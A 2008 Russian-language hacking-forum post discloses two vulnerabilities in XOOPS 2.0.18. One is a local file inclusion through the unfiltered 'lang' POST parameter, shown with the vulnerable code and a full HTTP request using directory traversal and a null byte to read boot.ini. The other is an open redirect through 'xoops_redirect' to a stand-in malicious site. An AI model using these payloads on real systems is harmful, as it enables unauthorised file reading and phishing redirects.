15.03.2008, 16:26
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567
Репутация:
2145
|
|
LFI
Vulnerable: XOOPS 2.0.18
Уязвимый скрипт: htdocs/install/index.php
PHP код:
$language = 'english';
if ( !empty($_POST['lang']) ) {
$language = $_POST['lang'];
.
.
.
.
if ( file_exists("./language/".$language."/install.php") ) {
include_once "./language/".$language."/install.php";
POST-переменная "lang" не фильтруется
PoC:
Код:
POST /xoops-2.0.18/htdocs/install/index.php HTTP/1.0
Cookie: install_lang=english; lang=russian; PHPSESSID=p113cjpff5dkrkoka01al18kk5; dk_sid=sfa6hlhn75pobg6kqe5m8p30j1
Content-Length: 67
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: localhost
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/xoops-2.0.18/htdocs/install/index.php
lang=/../../../../../../../../boot.ini%00.html&op=start&submit=Next
URL Redirection
Vulnerable: XOOPS 2.0.18
Уязвимый скрипт: htdocs/user.php?xoops_redirect
POST-переменная "xoops_redirect" не фильтруется
PoC:
Код:
http://[server]/[installdir]/htdocs/user.php?xoops_redirect=http://evilsite.com
|
|
|